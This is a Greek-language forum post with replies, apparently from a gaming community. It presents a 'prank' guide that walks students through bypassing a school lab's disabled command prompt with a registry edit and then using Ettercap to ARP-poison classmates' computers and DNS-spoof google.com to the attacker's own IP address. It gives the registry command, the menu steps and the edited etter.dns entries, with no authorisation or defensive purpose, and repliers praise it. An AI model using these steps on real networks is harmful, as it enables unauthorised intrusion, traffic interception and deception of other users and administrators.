Jump to content

Recommended Posts

Posted

Εισαγωγη

Γεια σας για ακομη μια φορα!Οπως λεει και ο τιττλος του τοπικ ,σε αυτο τον οδηγο θα σας δειξω τι μπορειτε να κανετε στο μαθημα της πληροφορικης στο σχολειο ,και να σπασετε πολυ πλακα !Οι περισσοτεροι πιστευω απο εμας,εχουμε κατσει σε εναν υπολογιστη στο σχολειο εν ωρα μαθηματος.Ο καθενας καθεται στον υπολογιστη του , τον οποιο υπολογιστη τον ελεγχει ο δασκαλος απο τον κεντρικο υπολογιστη !Οποτε εχουμε περιορισμενη προσβαση στον υπολογιστη!

Αυτo καθαυτo , μας αποκoβει απo αρκετα πραγματα οπως το να αλλαξουμε το φοντο της επιφανειας εργασιας -ναι , κατι τόσο απλο- , και πολλες αλλες εφαρμογες και ολα αυτα ρυθμισμενα απο τον διαχειριστη , ο οποιος και ειναι ο καθηγητης.Τωρα , ολη αυτη την ωρα που καθομαστε στο περιορισμενο μηχανημα και ειτε χαζευουμε , ειτε παρακολουθουμε το μαθημα ειτε κοιταμε τους αλλους συμμαθητες μας και και και ..... κτλ ... , μπορουμε πολυ απλα να αρχισουμε μια φαρσα και να γινει πολυ συναρπαστικη ωρα της πληροφορικης για ολους , και φυσικα ακομη πιο συναρπαστικη για τον καθηγητη!Αυτο , που θα κανουμε θα ειναι να καταφερουμε να παρουμε προσβαση στο τερματικο(command prompt) καθως ειναι κλειδωμενο , και στην συνεχεια να παρουμε προσβαση στο τοπικο δικτυο , να κατεβασουμε ενα προγραμμα ειτε απο το σχολειο κατευθειαν η να το εχουμε μεσα σε ενα στικακι(usb) με το οποιο θα κανουμε Dns Spoofing και θα αλλαξουμε καποιες σελιδες απο το διαδικτυο και φυσικα θα προσπαθησουμε να μην γελασουμε  για να μην καρφωθουμε!

Ξεκιναμε

 

1)Αρχικα πρεπει να παρουμε προσβαση στο τερματικο καθως μας λεει: Command prompt has been disabled by your administrator

Για να το αντιμετωπισουμε αυτο κανουμε το εξης:Παταμε δεξι κλικ και μετα δημιουργια νεας συντομευσης και στο path που θα μας ζητησει θα γραψουμε

REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD

το οποιο θα προσθεσει μια νεα εγγραφη στην registry και στην συνεχεια θα σταματησει το disabling του τερματικου.Αφου λοιπον το δημιουργησουμε κανουμε διπλο κλικ και παταμε YES στην ερωτηση που θα βγαλει..Ετσι αποκταμε προσβαση στο τερματικο

 

2)Το επομενο βημα ειναι να κατεβασουμε και να εγκαταστησουμε ενα προγραμμα που λεγεται ETTERCAP το οποιο μπορειτε να βρειτε ΕΔΩ

Τωρα θα πρεπει να βρουμε την ip του τοπικου μας δικτυου..Ανοιγουμε ενα τερματικο και γραφουμε

ipconfig

Και εχουμε τα παρακατω αποτελεσματα

Προσαρμογέας Ethernet Τοπική σύνδεση:

Επίθημα DNS συγκεκριμένης σύνδεσης:

Διεύθυνση IPv6 τοπικής σύνδεσης . : fe80::bc36:3bec:787

Διεύθυνση IPv4. . . . . . . . . . : 192.168.0.3

Μάσκα υποδικτύου. . . . . . . . . : 255.255.255.0

Προεπιλεγμένη πύλη . . . . . . . : 192.168.0.*

 

Προσαρμογέας Ethernet VirtualBox Host-Only Network:

 

Επίθημα DNS συγκεκριμένης σύνδεσης:

Διεύθυνση IPv6 τοπικής σύνδεσης . : fe80::711b:2518:56d

Διεύθυνση IPv4. . . . . . . . . . : 192.168.*.*

Μάσκα υποδικτύου. . . . . . . . . : 255.255.255.0

Προεπιλεγμένη πύλη . . . . . . . :

 

Προσαρμογέας διοχέτευσης Σύνδεση τοπικού δικτύου*:

 

Κατάσταση μέσου . . . . . . . . . : Έχει αποσυνδεθεί

Επίθημα DNS συγκεκριμένης σύνδεσης:

 

Προσαρμογέας διοχέτευσης Σύνδεση τοπικού δικτύου* 15:

 

Κατάσταση μέσου . . . . . . . . . : Έχει αποσυνδεθεί

Επίθημα DNS συγκεκριμένης σύνδεσης:

 

Προσαρμογέας διοχέτευσης Σύνδεση τοπικού δικτύου* 16:

 

Κατάσταση μέσου . . . . . . . . . : Έχει αποσυνδεθεί

Επίθημα DNS συγκεκριμένης σύνδεσης:

 

Προσαρμογέας διοχέτευσης Σύνδεση τοπικού δικτύου* 19:

 

Κατάσταση μέσου . . . . . . . . . : Έχει αποσυνδεθεί

Επίθημα DNS συγκεκριμένης σύνδεσης:

 

Προσαρμογέας διοχέτευσης Σύνδεση τοπικού δικτύου* 23:

 

Κατάσταση μέσου . . . . . . . . . : Έχει αποσυνδεθεί

Επίθημα DNS συγκεκριμένης σύνδεσης: ..μπλα ....μπλα

Εμας μας ενδιαφερει η διευθυνση ipv4, h ip του τοπικου συμφωνα με την οποια θα κανουμε το spoofing!Παμε και ανοιγουμε το ettercap..

9r7o79.jpg

Μην λαμβάνετε υπ όψη τις ip καθώς αυτό είναι μια εικονική μηχανή.Η ίδια μέθοδος είναι όπως και με τις κανονικές.!

Τώρα επιλέγουμε για το ettercap -> file -> unified sniffing -> network interface -> hosts ->scan for hosts

Στη συνέχεια θα δούμε τους άλλους υπολογιστές , και εφόσον θα τους μολύνουμε όλους , πατάμε mitm -> arp poisoning ->sniff remote connections

Συνεπώς για να αλλάξουμε τις σελίδες που επισκέπτονται θα πρέπει να πειράξουμε το αρχείο etter.dns από το directory του ettercap. To path είναι (C:\program files\ettercapNG\share\etter.dns) , και βλέπουμε :

############################################################################

# #

# ettercap -- etter.dns -- host file for dns_spoof plugin #

# #

# Copyright © ALoR & NaGA #

# #

# This program is free software; you can redistribute it and/or modify #

# it under the terms of the GNU General Public License as published by #

# the Free Software Foundation; either version 2 of the License, or #

# (at your option) any later version. #

# #

############################################################################

# #

# Sample hosts file for dns_spoof plugin #

# #

# the format is (for A query): #

# http://www.myhostname.com A 168.11.22.33 #

# *.foo.com A 168.44.55.66 #

# #

# or for PTR query: #

# http://www.bar.com A 10.0.0.10 #

# #

# or for MX query: #

# domain.com MX xxx.xxx.xxx.xxx #

# #

# or for WINS query: #

# workgroup WINS 127.0.0.1 #

# PC* WINS 127.0.0.1 #

# #

# NOTE: the wildcarded hosts can't be used to poison the PTR requests #

# so if you want to reverse poison you have to specify a plain #

# host. (look at the http://www.microsoft.com example) #

# #

############################################################################

 

################################

# microsoft sucks

# redirect it to http://www.linux.org

#

 

microsoft.com A 198.182.196.56

*.microsoft.com A 198.182.196.56

http://www.microsoft.com PTR 198.182.196.56 # Wildcards in PTR are not allowed

 

##########################################

# no one out there can have our domains...

#

 

http://www.alor.org A 127.0.0.1

http://www.naga.org A 127.0.0.1

 

###############################################

# one day we will have our ettercap.org domain

#

 

http://www.ettercap.org A 127.0.0.1

ettercap.sourceforge.net A 216.136.171.201

 

###############################################

# some MX examples

#

 

alor.org MX 127.0.0.1

naga.org MX 127.0.0.1

 

###############################################

# This messes up NetBIOS clients using DNS

# resolutions. I.e. Windows/Samba file sharing.

#

 

LAB-PC* WINS 127.0.0.1

 

# vim:ts=8:noexpandtab

 

 

Θα αλλάξουμε αυτό -> microsoft.com A 198.182.196.56

*.microsoft.com A 198.182.196.56

http://www.microsoft.com PTR 198.182.196.56 # Wildcards in PTR are not allowed

Θέλουμε πχ να δείχνει το google.com στην δική μας ιστοσελίδα -> θα γίνει google.com A 192.168.0.3

*.google.com A 192.168.0.3

http://www.google.com PTR 192.168.0.3 # Wildcards in PTR are not allowed

Στην συνέχεια το κλείνουμε και το αποθηκεύουμε , και πάμε στο ettercap -> plugins -> manage plugins -> double click στο dns_spoof,

Και ξεκινάμε με start -> start sniffing, και κατευθείαν θα επισκέπτονται το google.com αλλά θα πηγαίνουν σε άλλη ιστοσελίδα , δική μας Το ettercap θα βγάλει ειδοποίηση ότi το spoofing έγινε με επιτυχία!

 

[dns_spoof] google.com spoofed to 192.168.0.3 , ένα μικρό δείγμα.Φυσικά μόλις κλείσει το ettercap το dns spoofing θα σταματήσει και θα επανέλθουν στην αρχική κατάστασή τους τα μηχανήματα.

Yπαρχουν και αλλες επιλογες στο ettercap!

 

Credits:Δικα μου!

Posted

καλος οδηγος αλλα οχι τοσο καλος για Reputation τελος παντων μπραβο για τον κοπο σου.

 

[GR] Pistepse me aksizei Rep, kserw polu kala giati kai episis den uparxoun polla tetia guide's ;)

 

Edit : Mono kai mono pou periexei spoofing auto leei polla!!

Spoofing ma8eneis stin 3h lukeiou sta teleftea ma8hmata kai ma8eneis mono ti kanei mesa se 2 grammes omws gia na ma8ei pws doulevei, giati doulevei, pws mporeis na to usareis, ti prepei na kaneis gia na to katafereis einai duskolo pragma...

Posted

[GR] Pistepse me aksizei Rep, kserw polu kala giati kai episis den uparxoun polla tetia guide's ;)

 

Edit : Mono kai mono pou periexei spoofing auto leei polla!!

Spoofing ma8eneis stin 3h lukeiou sta teleftea ma8hmata kai ma8eneis mono ti kanei mesa se 2 grammes omws gia na ma8ei pws doulevei, giati doulevei, pws mporeis na to usareis, ti prepei na kaneis gia na to katafereis einai duskolo pragma...

 

το καταλαβαινω αυτο θα το δοκιμασω και ας έχω τελειώσει Σχολείο.

Posted

το καταλαβαινω αυτο θα το δοκιμασω και ας έχω τελειώσει Σχολείο.

Η αληθεια ειναι οτι δν ειναι χρησιμο αν εχεις τελειωσει το σχολειο! :P
  • 1 year later...

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Posts

    • new synchronized movement with neoengine obstacle correction I reported bugs to you and you completely ignored me because of my nationality. Yes, you were arrogant towards me. I sent you many questions on your forum and you didn't even thank me or say anything about it. I stopped using your updates a long time ago and focused on fixing my own aCis because you intentionally break the code. Just buy versions 401 to 409; you intentionally broke a lot of things for "IDIOTS" to buy from you. Anyway, our conversation ends here. Good luck with renaming and organizing; that probably makes you more money than fixing the basics. With this debug I created valid notes for monsters and NPCs, fixing the maxZ that you broke, and also corrected fly/water movements, making them more efficient. I only spent 2 months and I'm using Geoengine l2.j   NOTE: I'm not selling my GeoEngine, don't waste your time sending messages!
    • I'm on that same situation, but hey after almost 3600 commits it's almost playable! 😛
    • Probably due to poor choice of container handling items, you should test other types.   If it's not due to container, it can be whatever method impacting inventory, such as sort/filter/integrity checks. Bad synchronization can also grealty impact performance.   Another thing to check is about packet sending, you should use L2PHX to explore what is actually sent.
    • how do I make it so that you only deal damage to a mob if you have the right items equipped, like jewels, belt, underwear, bracelet, so if you don't have one of those items equipped, you don't deal any damage to the mob thanks
    • I always welcome bug reports and never ban ppl - until proven leaker - not sure where the "arrogant" part comes from, I would like to know what exactly let you think that (quote me please, and not 12y old quotes as the other frog meme dude). I request bug reports to be properly detailed, otherwise it's a waste of time. Other than that, I don't see where I have been arrogant. I got proper discussions with many ppl, not sure why you wouldn't be one of them.   I got 76 bug reports in my list (21 on forums, 55 on gitlab).   I have a single bug report regarding lvl 4 clan quest, which has to be tested since it's not even clear about what is supposed to be broken. Seven Signs was never reworked and is basically L2J based (we got a rework branch to test/commit with reworked AIs). Geoengine got no specific issues (at my knowledge), pathfinding was reworked lately to be way more performant, and I still try to improve performance using some pool system. Movement was partially fixed in latest 410, and probably will get another rework soon (notably reverting to the task wallclock).   "I" surely didn't spend 12y over geoengine - Hasha cared about geoengine during rev 334 / 354 / 390 / 395 and 397. It is solely his work, and always tagged as it. He was rewarded with money for his work, and almost a decade of aCis access.   aCis is a community work, things tagged with Tryskell is my work, the leftover is someone else work. 22 ppl worked as developers in this project over 14 years.   I would gladly accept whatever list of fixes/reports you have to share. You will even be rewarded (you probably know about cookie system), as anyone else sharing bug report or fixes.   My main concerns lately is the lack of decent L2OFF IL data, it is my main bottleneck actually. If you're aware about decent L2OFF data to parse, let me know.   Eventually reach me over Discord to speak, I don't want to continue the offtopic over that help request.
  • Topics

×
×
  • Create New...

Important Information

This community uses essential cookies to function properly. Non-essential cookies and third-party services are used only with your consent. Read our Privacy Policy and We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue..

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock